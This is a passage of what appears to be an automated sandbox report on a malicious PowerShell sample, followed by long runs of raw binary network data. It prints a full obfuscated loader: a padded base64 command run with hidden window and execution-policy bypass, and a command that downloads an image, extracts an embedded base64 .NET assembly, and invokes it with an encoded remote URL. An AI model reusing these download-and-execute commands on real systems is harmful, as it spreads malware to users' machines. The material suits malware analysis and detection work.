fwwBJMvJwBWoUfwwBJMvEEoUfwwBJMvSQoUfwwBJMvnoUfwwBJMvCkoUfwwBJMvLgBJoUfwwBJMvG4oUfwwBJMvdgBvoUfwwBJMvGsoUfwwBJMvZQoUfwwBJMvooUfwwBJMvCQoUfwwBJMvbgB1oUfwwBJMvGwoUfwwBJMvboUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvWwBvoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvBboUfwwBJMvF0oUfwwBJMvXQoUfwwBJMvgoUfwwBJMvCgoUfwwBJMvJwBkoUfwwBJMvEgoUfwwBJMvaoUfwwBJMvoUfwwBJMvwoUfwwBJMvEwoUfwwBJMvawBKoUfwwBJMvE8oUfwwBJMvUwBDoUfwwBJMvDkoUfwwBJMvegBkoUfwwBJMvDIoUfwwBJMvOQBroUfwwBJMvGIoUfwwBJMvbQBsoUfwwBJMvDMoUfwwBJMvToUfwwBJMvB6oUfwwBJMvEUoUfwwBJMvNQBMoUfwwBJMvGooUfwwBJMvWQB1oUfwwBJMvE8oUfwwBJMvRoUfwwBJMvBroUfwwBJMvHUoUfwwBJMvTQBUoUfwwBJMvFEoUfwwBJMveoUfwwBJMvBMoUfwwBJMvHkoUfwwBJMvOoUfwwBJMvoUfwwBJMv2oUfwwBJMvGMoUfwwBJMvSoUfwwBJMvBSoUfwwBJMvDoUfwwBJMvoUfwwBJMvYQBBoUfwwBJMvD0oUfwwBJMvPQoUfwwBJMvnoUfwwBJMvCoUfwwBJMvoUfwwBJMvLoUfwwBJMvoUfwwBJMvgoUfwwBJMvCcoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvGQoUfwwBJMvZgBkoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGYoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGYoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGEoUfwwBJMvZoUfwwBJMvBzoUfwwBJMvGEoUfwwBJMvJwoUfwwBJMvgoUfwwBJMvCwoUfwwBJMvIoUfwwBJMvoUfwwBJMvnoUfwwBJMvGQoUfwwBJMvZQoUfwwBJMvnoUfwwBJMvCoUfwwBJMvoUfwwBJMvLoUfwwBJMvoUfwwBJMvgoUfwwBJMvCcoUfwwBJMvYwB1oUfwwBJMvCcoUfwwBJMvKQoUfwwBJMvpoUfwwBJMvoUfwwBJMv==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received We8– I»Îol¡ïÿT±È@x€ÌêrHDOWNGRD ´U¸·+$×Ç¢¦þ&3ÏÇM N¤{嗆@`xõxÀÿ 
Data received ~
Data received K
Data received GA1ùÓ_ç—Ãm@ÞóGáÉ28K¬G9› 5 ÝáôˆJLyç+:@ô5vý$Æk“CÍæ›j¼!Ô5„¯•T­RgþYBÄ ~Jû҆óøZÉ `˜ß êzž¨§öû¯KÝ^¦p¯ÜôŽûë»Øˆå¡2¶H떐ˆ^´÷qAäƒ`‘ÏcZnó¼({wìuÊJ’¥ï–#LERÞAÏ2…£WÎ':4†"•ÓRÉÓ¦Þ!jnI‹+Ø~Éb)¾Û®YBTÏf…ݧ£syâGÁNëi2åKŸh*)3Š³°Tº±)®Îöàè!Œ®r)'uêŠf^øq'~6J¹ÎCóü’(LF¹X•µà£Ý¥pÕ bœ2‰¡…1:Í;XîÛÝ©Ïõtѽ$ör1?ÞN¸$/»ïЦ|Ó²\õ–úÅäx
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received eœþ÷'å7sEÍò0µÓTZ6’AH˜À±ré]ÿÇ#¦ÿ«l?¬‘#¶#LÂ
Data received p
Data received ›†—­¹bù ”T{}‰CVÚà˜nëM2#â³R·Û °ïIå‚Ö#ÑF´´ËËi°iÁßõs£ O¡Ûµ|æ"Pˉ¥ v D)dÉ #ü¥&^G&`Eþ‘Òè R-ð®b‹9c{ziAOÀ§` roDÊò”J6aæÝä@s…ñ¬ón{\z;¾ò³²þYë÷l†;Ê)6 ™ó‘1aø†O[Úñç8Ë=¥Ç'ªmhª§Ž¤ÅÉ·ONÇ/»ÕÓëÔ )â»ë‡f¤f*>%¯ùP¬½è1ӑ2ûÙ3é BÊÝ7ìæǚHý|5›d%š¢±=ø³hpùPBšÃ²œ‡»ˆA‚ú=^t4&fà!+hVDVx¿WAs\Idî< ÅëÌlžá®•)Hµ©-~ù8Nê¨Aï+zý©ðdŽGÿWø%_¼LÒB E¥Qm%Śʇ~=i¸(ù.‡JH쑠¸.‚‚tvédMüX*ˆëÑ dõƪà!]×KÅdŒcÃ*f J#*²©úæ(9ŽSxJa\ÚÑÔc$vŸ‚9ºnQѝ„‚Ïãc4ž,@ÀÝò§?.À°@?Ës‚íYN]b7y—+>X »ÞK“+ˆ(+ö›Ù§ZÜ¥“x\Sù=ðÀ2Þs›†›«ÏÇ—ktÏøh?Ãgº“>î8‡¯„þl¦^£íޟÅcÝ£FPd)]@X}õ„j½Ý”¥ wðLûÑ1/¢‚ÑU÷VÚՋFBÁ—’LÈ yœðLǺc¸÷)V,>Ü`­¸öºŠˆ=4ua¹ÀY±jµÐG˜×Hˆ= ¸·Ó%¾×Ù§÷2æ9ýýLÐYŒÖ½ø@ØhS.FºÖo0¢€ø¼ÿªß\õ »qÆE(¢‘Ï“47ödå(wCüšÅs“ñ›SÍÂl?ìãq¾#ÚnªüˆàfðØiÀJܽ( ms³ŒNË%ÿ?†aõ" x½y¨A±«júŒT£Þk?À¯ì4’ÈV÷ë@t,ñïÆòxÅÌ«®ñžp>šWã]Ç©øaG"¤°ø}8‘/§qQV< Ùe”i ÿ¢¾Ûê )–yPUII§d¼[co"™»>ƒ¹æ£³Cc¥!pú¬½–G\WAX{[ñÎ6ŽÍipÖïˆ+}oâÞ:NzhÙ\·%ÆÂÏFýæZ: <B–™Jt$o„ æ¹¾ñªävù?ÍۜœÆý±j†¦PË@q̺‚‚x6Äx ±fðjOôã œhŠ:­TçTŸsuiS¦/#k ¶E(S•O±å£¯ûÍÿIù¹«¸â7ìë~ÂïÂe¤ Õftk(Ùþ12×:UÍ…cÙJ6\ðô‰Ž¯û@¢ fÍcÀ¹~ª´Ú¬Áý JC{‡x¼‡ÒßiØT!g Ö¢6™v„‰m먲¸”¿¤ŒÕ,lo0>SBÄÒ^òÏÇ"—ց¹Ì(y¿ •³ ï1š@LÚ%q¶íZvOÙôö¡ÖºÞøa#'©–á"ø¢ Ã*I¿HtÜÇS-¿¬Ãó ÈKz‡ºbÅ|MPó—2ŽÑ`­×‰¤¯ ´;t€ z‹ívé¹öl‡6 à«ÏùŒT«d©=û˜Éô§½Y ®Ý?Ú:à—~\‰:k ô¥'UäKà+£y£¥O€¼ß©«û,%.à×=?ÍSúãüH<„wR«—¦ŸÎoÉ9ÏóÂÒ¾|¾ÞïqæD.AƒÊ^‹Ú((–ˆÆÁ 9 ΰ•/J2JÓ²…½ ™RìÒû \ï&+5èdø&ÑmØ9:
Data received +rka1m’½´O³ï*¥ªÄ-«–$àÖI¼<—5+ÈñdnpQæ÷†ò¼ŽP§BWôÀeαd.ÈûÚÀ îäñ›/œ8™*ëë!³äW/Ëx=Ànõ·^…ô…š\êfõ¶Cýn0u/Ô÷7v8#û9vw{=îVÙ~°_Ð3忦3zƒã_ôäqfjÜÉÈ"Z›Mp̕—.ªçÚCâAËÖ²÷π½ üéGì‰ùžÈT>ðû۝øw ï¤ zÂòä¶ßߚä'Ã°’èÀØ­pñ«|ØDÏthÜ¥,²ŠÚ±ÎG˜¢xZ_ô3W”.ç¡"+ÿ„â õÆÄZÜ#Œ¹ ˜¯x“õÜX53§O¼ nԖ’Ðò0fœÀ•?#VœÇð‰pEƎóGIœš½Âè9ÕB±œÆ&I¯x«a#ÞtýÝgŽýlÐWŸKÚøw»©†w ÕXqd.'’WÉH¾Uº4µe @˜c`%¾>M{RuӇH<وd¹LU£uàܸÑÊó±@ '6€ëŒ]§Á4Gø8EâÒ+¸ &RËè2Ìe±«*8>8lŠÀþc®>؋M±àˆXš*¥mÎwNo F‹­Ë†Úà´óô,ç'ÿÃC¯P¬¡Õ¡Œ™^< wØÚWå‘~÷.l}JðÞÅóx@-K†üA#Øvá)HÛîA@ód›|}55C0eê¼ÄÜtžUîîbååÓ²q*%`*‡RÒÐÔN‡>øõ9ÁdAo 6uiŠ?+ò¥ýÇÉ,íÍh¨°†´GPƒŽÎ= –/ç½½O†¡L'‘±³òµ;…µ ¾Œÿ’MySP`ÉÌNŠ~Ææ3CÑåm FJ—ƒ7'ñÌg89¦Ù)ùÉê3xFå©48óê«b3?©_~Ô Pªmõyx ±ÔŽf'Tû?W’M{ªC€æGàNÿÔ×%û”Ô)%ٍLZ³Àøïj·½Ò—aÉá’kZöÛíÐx8ú „Ÿø@}n袂îÄöE» Óª@áQÕ{Ñø¾XuKZ]-8ÿhS÷™ä•VÉ8kõlí^¡ùų³ޯj9¸B¿z·"oP ºmF1–ÍŽÊÐËñS^Òprz²¢¡Q”©óø㟐0C›à°Æœ£=O˗îƒA]V´íéÿ@ÇòÇQŠTv‚Þ:Ò¥ßȈ¬W¾ÒԀ °ƒ–õ•u“ øâ 6ÉÏö2yÑqÕ»äêv nǧT0d‘· Œþ=@錴ƒ £{ÙãЩ%×ZDzº[9Ǝ3€n“qÈ'sÄlûe .„7\ïnÕW»ŒöäSºTB›ÕC:_dÞÐ')|ªH_:§*a|Xe%zðZª†äCi`÷•0ø¬˜,©>6àWïnt@YÊùi;(­»±˜Ù`—Å(*~*î}¢V5Óh¢‰GoUZý…6+ÓE:\ӃøŒ`  Tm)Šð Fb¥¶a$Ä÷ Þ Ùå=+:ºqù9sëQC´Ìœ~ç’¼³GÌK4Zò¨ûêä”ìŸUÂËz3æžY돃6mLÎG0º°× d=ŸŒ‰×Mw÷À[ь'Êâå¥Þô #°Y{]CSƒçÍn—ÍrSÜó9åGéIÁkäŒe’;¯{NoÎì«g\‹us&p¦„&<ãœgíÃ4E^Éþ,Ϥݝzá*±¦ Pâgµ½q«ˆ¿^Z A éÅ~–Z¤ÓÐsQ£N©!´‘IdëÆqиó©meKVñzOäñú_Uvq¯
Data received Ž ¹ÄÑ‘íNí7Å<{p~=Xæ:¤Å@΍&ëU†ä]ÉÒ¿XŸ…ƒk”-?b¶;TNâ‹]êRUA—„ÃS•¬§U02ÇÃdÉ])á^0öÙví-FЭCш.ò¸Fr|Å'}ñ äÆËr•GÑ ÜHµù  ²þI‰?„²šçŽþ`“p4ÔØ¢Yæë%hDºZÙùn[îÓäY!¾¨ÓÄÚ ½žz×Å»À_ãØU²m•€ P²(§ú`ÁiP8/hû]YÒëýLÏRi,]:kޅ3!-;òUâ¸H£q=…ď;Nrè¦ÌA÷Ï»7qˆæ95fn‘x®·’ˆ¼Lۓԧ> Ië‚Ã&亇­Ü¯Bð\Ð^8á<°ç1ÏÇ'æä$‰»äcÙBòX£¬|–‰¸ÖY¼òAÅ1L!%‚´Ø4®ÑÅЛv«9€IûX—þÐÂ6æÄoP²ásÂڛÈÿ$ÜÅŠK:쮇挱N´ôå…l©ùh´\»¤öaÎôIóåzB‡2‚"ä%_± PÑÕê¢lÙ7^|Òœ +wr9¶¢eäcú°þæRÜѽ³ÑññGšZ§ãfa´Gp› 6˜´™Å™àÐ¥ú~s#Ø'1PÎZ¸ù¥£ÒñºŽA2U;# ¼©üŠÄä–ó³úï\Ú=À„sUÖid³¹ †Q†ôý¾&àÁ\@_ë'•y¯ÑÉÎ}fÿéŠP^¨ú9È2!žrlìj6n„Ó^¬¤™@djÝnд‡ý‰ AìôΞÂ`¯Íˆ¸œ‰ê¬l0LØdz ù[ˆµgÌãàÈÔ~ä¿ì×±ú-ÄÌÅâÉ'©ÏQa%@0X%¨Cj š.ÏWŸ–D¥òµíÈl›s‚ìÉîöJò¤Õ[úªj­3äf;•ÁC ¶ç©«¿ò€`ð#‡ÿ›ºÄ2Ò6AÓÚ%& ìvo 3‹”3ö½®£û£d6·Æø$ E jº©4Ð˛™¥ù«D·3j~#¨ŠZbÿçŒÓs¦}’ëtúk(Œ%°€т9z£ë]£stb?¤Rb7à2ÍMYÿ±/)‘†´n“¢¤²Ó9¸f¡j…z{N%Mš‚Æ܅¸þ8T·Ý¿À^Û3M˜ï‰Óruxl’ ÎÚNѬ¨¬l›N%´ÊyÊ\±½B¤˜¡àx¨šÁÒoa¯¡ÌÞbȅմ–Æ­ÎÓ,‚åՉ]ã9 5 õÔ¢~«èÂwÝ%P#sjgBÑØË¢yÿ,_Œ Æ"E ôè~—p¿QŸN%ˆ¿i@Aÿ­y-=ü¼÷;!†;þ(=Q﵊£s}ÊÚ`„:„j±!š¬Pù]É´ïËdiއܺ–£]Ê÷ÝÔ^íüÚR·jg¤U–{àÒ´µ°";*ž™}õíDì—Øÿã[š†7Pî*û-3}skD¯ˆ‚på®z/5Xk]4~yR´±1:u~$†_Ñè¤,ÔÿO#Ò¼åŒI1=…:çÚI{†«Ÿ Þ²É(ÀúǗ Œøb1ãVstÊKà ‹ã`zŸ4ÿ ¥Eº™«»­9 ¾Æ=ÙüÁ¡i_2ý°š‡­Žˆ>ßúéí Ò]YHËt½'d8~ãÕµãÚë×}S/˜ 8Ð^äl)eÿ²§»ÜÝJ¥ƒqé T$UnPš- MŽc*/Cõ•³”r†@cÍ‹.è»ÿ›ÝñV¨¨iÆ9V`Ƹg$OpœJ9‚Ñyi¼ýJm;ÿ|?„| ìZYĒÃö
Data received ø©Vp¨[Ò"4Í"ElÜ0èÎàŠòwlwÿP9<6'FƒJW²û4o?{¢()j…•€Õª‰2 J`ƒôD9(@?˜Úè(·§¬J<w×3T5¶GŸ‰fCÀbOם]ü=kq¼ê71à[!¤uªü£Õå"¨¡©a0G-rqÞfä'P;l&µELi”¬ÜìqnD+ö҃v6›³-ϐ¹ÀÄË=&­Œ€£Š<ÿÓ=á†s_Mx˜;PþF­%uz²ê¨(]k` ²Ž*½½´¤ÿÆèŽJßKW0ߍ!XkEË_WœBÈ¡®Õß"VÇK¶õ4¡X ŠÜÝ_&ޑz¶}Ï|#}˜B´¿½«û¼¯å KÜTq™î°§Ôô°io‚™«Æ˜7ŽÂóÝ5ô®.½Œ§1Ëý[C:lym'¾ÕH1½„›ÕH€œFy奦aÚîCEYÏÅêe3ЬêÒ×ÉbûØԉZºñg´¡Àk#£°è˸À”™½©ÖAÁ'LÇ_°~Pn.ÞIì Ö§*\ðƒž¾cso»6s^> €÷ ©/j-¶Êhá$xäoËüj!\q̍tžUÊèi#[t³í@ ‰Ø!47 ¹·k'p5ُÄûáÿŽL XÖ\¨«ó)Ê Þ€¹Ù:È+ šy\4…ääk—ƒ0(ˆ‡(p5M«hoª&Aéx3OsÚëƒ_pÂLá-> ¦7ûïPr¨%÷XDz•ÄmýcøŠÈ«<•/„@›Y¡À˜dáoâº]ð)—šÈ `ó­¯l}wOñœ¨"xþ1Û¦ ‚Æ‹AÔcúÏ}j@‹|¯Å)ñêT²1<ñ£ôö¬õ ||‚ÙR¼}gEŽFñ6¥Ø.Ë¿ŽtpÁù+ ¹åº%*Ý|>Ä7!#wò,õcÖazt˜Wf>á0 1.®§‰Î&—‚#Ÿ±©z¿róQˆQBܹám<¢…ð!Š÷jÜ(ÞPÊ_Imú‡ÞG‹\Ñn‚ûr¬P)—ÀÊ2#=ÉL´×ޜþô5´Vërqy{•ë=¼ÿÜ3cø1¾ðõP‰m¾Q©GLÃÀf_<ôG…s£˜^NœWPÝ´z&Œqt•B6(±ÔÏØzåøU¿·9ñ ^c{¿B/h³ØF ›·RKôJ:±¦ýL¨rcQÑăӬè%ŒP[š\•£ÇjBWe#=€ë Ӈ˜]BSÕ*$¹ü—ÂMŒlŜÊê@¢BÛÕ'ÿg¶)kn'ê÷_ %êe¸:bqð_ˆ3ô ͝¤—¹¨l" § 7H9/_“FÆá2Ò¾|¡°pa>:Sk‘jogËSh»Í’²ÀºÌ(/xê&›œËv²%”es¥&­)ôð픘QCámïÈ~'q0ù”³’K³¶SûºÌWnP£­f@¾¨ÒÊ®ªDHdö¹ ½qÎôcsz?9J5³ýYa¯;Ó:Õ×êÀŽ`æj¹$µD>å¼ › ©Ž ëàœ§Â,zÿ î…« Jï`@àœî'#ýÅÙjF“%iÅüÆñyt=ZI7aðaÌכ&©‰K¾N®)& oë×0@Ä)‹Z°õ-íà¸yyYŠÔ<äËÙĈû±¤fÝ1,-¾àì¼±nØÈHó—Æh/Ïs)…×P:uù,®±ºíù U Và<x`©Ë£Üd7—Û¬Rì…ïïàÕÊSÌdÂÐjÇ ˜ÁplÕ¹çz›BoÁç‹@ïº-ÊxÀfœ£R•…
Data received (;‰¯A蚚Ÿn'2»èSèXëµ5õüX8m}"øK©dŸýèÏ (ì£UI_3{Ó¹ç&åMtÇ,L¤F¿;À%îb§—w÷ˆ¥ÈX‡œvê¼üKEâ/XQÈD~:}ø•’ í4‡DʪÀâèÞKÆÓ¤!ƒ†žv=Ô%ŸDìK‡Ôà»öRt.S‚)âOˆR¾þ}òŸ4:ûG ¢‘Áñ­\E¾²cmfb§_1fµ¬Àí!vòj¦QüÓåöµ3ÐLi ÛØ/ȹ âïÍJÕo¨všËšeÒl[|³ŒÝü”ùÞ"X¹TrÇЬ21¢O¸×ÒR*r¶ÏVù›#ÇFÞt`Úk}Ë)59Ãv½ÒÀF//$ôdHÿ<•uõºW]a)÷FÎAâ|Êè§Ù‰¤g["°èÎQœ’qÕr©þoÍèû»"ÕmØE0‰Ö £ƒTæà xnÒê¼£ÆfXþ!Œí‘ððÚÚ_”½«¹"('áH;h÷ŸçaÍÕ\ L·v,ºŠ»ŠA µ³Sö‚c-[—õίX \ÔŸSàŒÐ|I¶ó:©ÔÕI]îE:3‘ï룿»„F¾´²º¸z“*Ž¼§äsqh ¬CÖ»²„ŸùmédÓCÖ¨‰™í£-íÑ@0úS¹€¼æ ¢0ÝôÍq3²÷’¢þøliÿòžô±íÙ;HæÐÙº°Écµ¾š\Dµ{˜±a‚«ƒ?cú`<.LÛymÔ¬®¬9G¤?YlèÒ'Ý'rtîǺ³ùÔÐ~4 \²òà†ÉP!.UÔ;C͏r]32\ScƒÓšy\ûèÚíËY3ՙ vd–ë*é¸ÊlÊm€éœ’]‰¶ošâü›F¹N›ï†Á°YÿG?ýùûD£ì ‰¥̾qåÿë,ÀÅ5©<ßþÉÍE0ª± mG2ïÞ’l Ïݓw‘-¥T6*mž;$<Úž'þ”¾ÌúÇóˆhRµþa$9ñ‰Ó‘¨ 8Ö¢F(-²Ñέ+²%Gê|Év}øP¯Ï÷=%ÈÓneGæAhúѯ°'w<ʾ®ƒ óOT0²JȀ,€ÈÞLhm‹Ó›É\@h> e Z¡‰|±æ ˜a± ¾Ó.¢9RRz.Ù°\Œ^×›åMécjŠr“ÖN|pžUÚ Ürû _JúªyGô„ãÿ.h Ž–IUSé’oàEéÀö(òz®ÝqÊáTɮɻçôÂЫᒆ5GÝ@”<ޙ1æ¨ÛA‘")-Ø €ÖèõÃŽ %º¬È&³ñÚ¹éîS±3¤Úɖªú“©³—0† ù áÏY†‚»©ë 2î6° f«à™Ä§O¦®a[‘Õ´Ä lÐ6ÆdSmÜç6) œê얊,2#N•°4Ùͨԅ¹äs3˜‚óžpõ͆×Q&IV¾Ê¡ü£‰ïtÝ yvX¿7ÃC‹ùíñÀՌŠ—Ý-öòl<ú¤ÚÀd³íþ½ÎôK#ÊÙª~8YîXªª`U#~íYêÃÓcºt / Çtú´eç¡ýÁ¨&ïQÝ/Î&J Z¤ ÊFì,*‘ˆ¿,X*“c{^©H(—žíh{ÃvR³”':ŸÜ™‘ !½ì Œ¶j%äøLô( VÏ0r¤æG§ÿMÛÁ‚ Yrds…îњșh:r0^@Ýâ|0Ô²H; Uê’DFÁV®®¾U6‘ɳ:Òâ ìpŒ5Ú=$lb'ZYÏ0ê$"gØ@ŽE.L)† vßÆH³üªw̬/cís5[§¬óª5ƒw)
Data received g½^ôpm( ª iGçå^lÿx8˜O£Mámwl…f@³/­ÄֈVÙZyÀÌsýÝ]²{º#RÙ"þ?¤‚$yŽí-ß%¯Id«ðøl)âp Jƒ„måèåë®'r ÏûœûOLàò(KÊûøX/ÍÛ©w”›Mâݲ̧f„«^[ ž™!#%x½ýï h:B¸Í,ÿۯĿáÌۄ“¢ð(MÌ%Š¤„Óœ|sX“IÙT¼Õ¼1’¨Ï6Ü8郇y^òêH0®M*üc- ="t`‹‘ür#Ý"£Ö@£Žáž‹Æ•Q‡Ø|©×+! p+à›þ†ºŽ,pëî2>ïŠS ¤‡^,Go^±rB\IÎcÇÕzò¡€#*¶ðnÇËsÁ’g‹tCX K`?œÌjûmŒÉ ïYWÎ8f•IR͐ò41.åæv«{ŒHŽC©R<àR¤4E„ÑMreÆ*R‚¢O šbe•à3$2ô6Á.ùoªÄ^^:TH742U Ÿ¯"’ C–톘H»‚ÚAW©@ÄZ…0à¿ù”3»ZÖtÛf^g³Ñ{4ï¥p*¡…,{c"–Üš&*XŸÆ%\srA¯ø6b.·àr UJWS„½ì——/ —«éì­Ç\w:ýŠÂ~µdá,3„αtܜ½nä4{ÇSa’‰u͞–ÔLw™È¢³ æ鬾;¬oçÚ/ÄRù ‹«‚b?ˆ ÜM`¢ ›wþx‰Ç)*“­È£•÷Ô¤eO¹=húûœz)öDUÃZ(”à¬á¸ à †Øß³†¿…€P[±ÊE 3cžE0–©\ &Ff3ò„d/{Z礯#™}Iˆ¢u# þÑú°3îšm³p@¯Uækœƒ… ¯êLi U’êlT0ð¦p#‡)X¨ž¯™é7Ž­L›ßH£ |ÏÅÇK–š†.ćW ó´k» kw¡Ìû=ƨ¢uõÉ!îÏY¡>›8£> 8áÖ°tãïøžƒUèÆm&žùÏ'•F˜Qf®Eßþ 7k4NW#šh wÖöjw@ۜ7ò ÿAÜÎHN#£ŒN˜ðPùòÝþ¨zŸTÑþå8c‘ÈfŒh ©§v€Å-Ã4çÏߑі¤®SU»Hê£o-̸gÒQ杛næ¯;·8¿¶þoc¹ôâŒó9N™D4'Î5l»Û/ €bŽ>&yP“ð9Ü;˜kp_ñ~M͂;Í×`®6ـk_ፂˆñðK ¹“\F¸Œ£9þ¹69½<,ùÔ7Ãé;·$üM£\~”púƒ‘– |E´W}¬K­46}æpúˆÅËÖj$±•¶ðkH‡µ.¨üJÎvAÙ¼²„¡gܐtoœސY)CIpòÃb½ØÝZ} úµñštÏzLìáþmÔ²ÂoY™—º•”>8=<ӓJóÍSA~¤Xò}⩹)Áé1e('¾³ÔóÐo£àd¨Ûp__ÄãªÚ˜VÆÙh_ךI„s(ŸnT§rߦ ÿ˜¼¢ì«¿º“Üí­Oæ®û™êK¬a×õ˜ªžNâ4‡ãVõ‰f,? |Êópø5Aú¥*s?ô¦,KN~9¥¦Ðü¨º—OWzîu3>ÿ¦þú•Ï9†:)5@‚[Ðӓ¸óU–MˆÆô«ÜKг CU;z-×4—I”¢ªj ù“I `²ŒªLQžhÝmžç}S8À‰s{”ÚoxQ×m'ž»’šCàèÆ]’$±a»AÅè}¾¿ƒô
Data received §ÂOpQÁJiyîC嘯׺™z¸dÀ¢Ý…(tÚ;VåòÔ#VCËsMmù«™ÿ5(ø}u õ›ÊZIPªs#–³{3š—tFLoÒZ…júå›%šNÚ\¼ÓÚü¸†G(–.#tû› à`9ðbžšm)µÕë;9Rc•‹Å[œKw¬Úů-ÄÜÖàAû…›Mž’Ûå ^ kތfè¢1.JG{e²ê¹X‘=)¯â©ÙÛ»<“žÝŠG¶J¿‰{ÿğɋ|©!ÁR:á¯í$v«ù9F\ ©¿wä®9»©ç|;žÝ-¯†ºXø©5¥õ´ÓSðæœëìâHñЙ†N*çÍߕùŸyðŽKdŸ}\`ÙY%6Ј:ÞF@š„KÇXi‚þ¾%o£PŒñžôwD@øi"Y!Ó¶J##ƒaãb¯Š;6ñŸŽNõé¢mƒg ömˆ%;%t:‡©œaWŽÍJóƼÍÍ =FžEëf!LíùkÃßù.x•XZMÞRޙWӌ _k j?ñTX û¡zbÕøj_o –;QP§¨To´·1œ~Òë7_ÛVãŸO²› ¢V­ß±£Ø¯¤Äìߌ#8sœ´­Ço5ªÐ4’€¦€æUŸ:G…¡†X®.ÅmÒz²b {{ÈÝ¥ù‹ùÜÊ]ë§L€¨s8~Hݜ®jÛ|±Ê ¹¬fÔ=0/Ï›2õ%֖nï )Ž‘ 1äXÌÍODô¨o~€¥­Pr_“Ô5·{Á ô؝lÖÓÓkß1 C½…Ê À3ÇPÏ<õ7P½Ø“]`é5û ˜ôsÊ÷ÆôQ/Lð´P¦‡á[›ÏÊo?Ü®v5ள½~¡IWý´·'¤ |Æe©Z_`‘Äd5æ\qö‰PÎKßSÝl°íU\`ïóù´ ¬fhé=ü­b:ö(Šô°¤)yj?sVû0_´þ̴ܮوš'¥q´*W„¿É 77|/ê›b†þã*/9h6”Ãå>º¼ÑÔ85Ë¥L÷±™šb¸* €˜ÿèo;ÊÊæYˆÖõR¥\õä¤Z‰êSºG D¾ÆÁå£ØÇ»€Tò‰' ñu½»nv>ýÆióœrt0ìZ)üG*¸ÁÜ^{#FŽ4y”î!ËÐ*B $‘Ù‹)ÄM]7ÝP¦nC½¿ãàù&öùâù/:У-S[¦­œ[Fßå2›€MºÿÄ┓Œ'uð»ø¯%«pcvË¿ê~˜•' †ÿ»ƒX°Øïµh–kBkR|ìSF㝂Ÿeäx|øלéë·ñ‹%¢Ãú¶½øñk1y銁µà€ªŸñÖ%L¢+M˜½/lk«á0¤­‚û+ŠV´$£öd 4ÈB‰uªíÌÞ[h2@lÕ –QT% ¾åu@Ôj 1Õ»– ¢^?¡ìiñLE©K…,›ªiêÞÔí²Íͪzà•nK‡Mù:ËY3°Á>i¡UNêîøvœ^MFŽ(Æ>Øp9‘Q/r¯ƒŠË翖]¬#€Ø³èùxÞ¾õ0— †9Á³$h1hÓ½#Sû43õ7¼XÏÌ{yñÝoü!{YԜ Øô7B8vI¢ÁÙÿœÇx³Qù 9`Ð>b´´Û?i}zÑGAk¥ÜÝÉÖhÅW o¶ ±‡x1„MïwúƒÞVµòÂmØloÁfÊúh "$²6¹Es7-9È×Ã|¯µq`׿{›† ú®NѪŒÒ%Kø“Ü\ȨxŸ
Data received ’Ï 1ìuAóð؝VA"Téx§WÈ$ ÿ×æµáävÕ±ä™l˜ªÎÜc™j3¹¡ñ¼­0­‰šã|äqï–#ÏËԀµò™¢ W_Øy¾˜m.n©²ÌńtlќrÝySbl¶à¶8i¦1HëÁ,>]^kÖØ+(å®9-à|ÞPÊû.Àї0±{ýÿµ~qa©ÔÎnôçæ/—Ã4öܼ‘Wžê&ƒŕÊ⚬[‰F ÞþWžù|<\•V1 ÎÁ³a6Œ5uOÀþ/-Þp5yÏø¸A¢«Ê4`—V  0ÌtÜëké £m,-õøÌ éºHwjöÚ|º¯|ñmg¢SǬW©~ñ#»«—SëîÎ[@4àhØc:¼։ºÊKÃù2þ1o¯ µ³Jöz „äèËÞ¿m9,õ=hô°Ü0+mìnULJL=ÞëiK%³;E…s-×ÝÝJ7͞퐴ף[éï.ƒtfÞ+©‹¯_ÓNþý¼ÿ*q’݇[$ä§ìœ®ƒŠ ôÿ*ÖOJíW~6†ºy{Ò.öUÕ`¼û–±öní+§t€15Q€vçëójúÑ\Mêýÿä“c±Ì™ÇJÄ9¾tS³7fŽC’Ii%çUï|’@Ž ‘®°G`G!ú‚HqH`J×ÀZa¢*É» ‚¡ê Q‰8^ ‰íej˜³Úþ§Lëp¼<ÇR•%‚ˆè¼Û|çn'aÛðåÿ&s(˜SŸ`¹ ϛ•¿1mnWÖY š&LMÉ27!ã…=!=WÄÍB÷ì 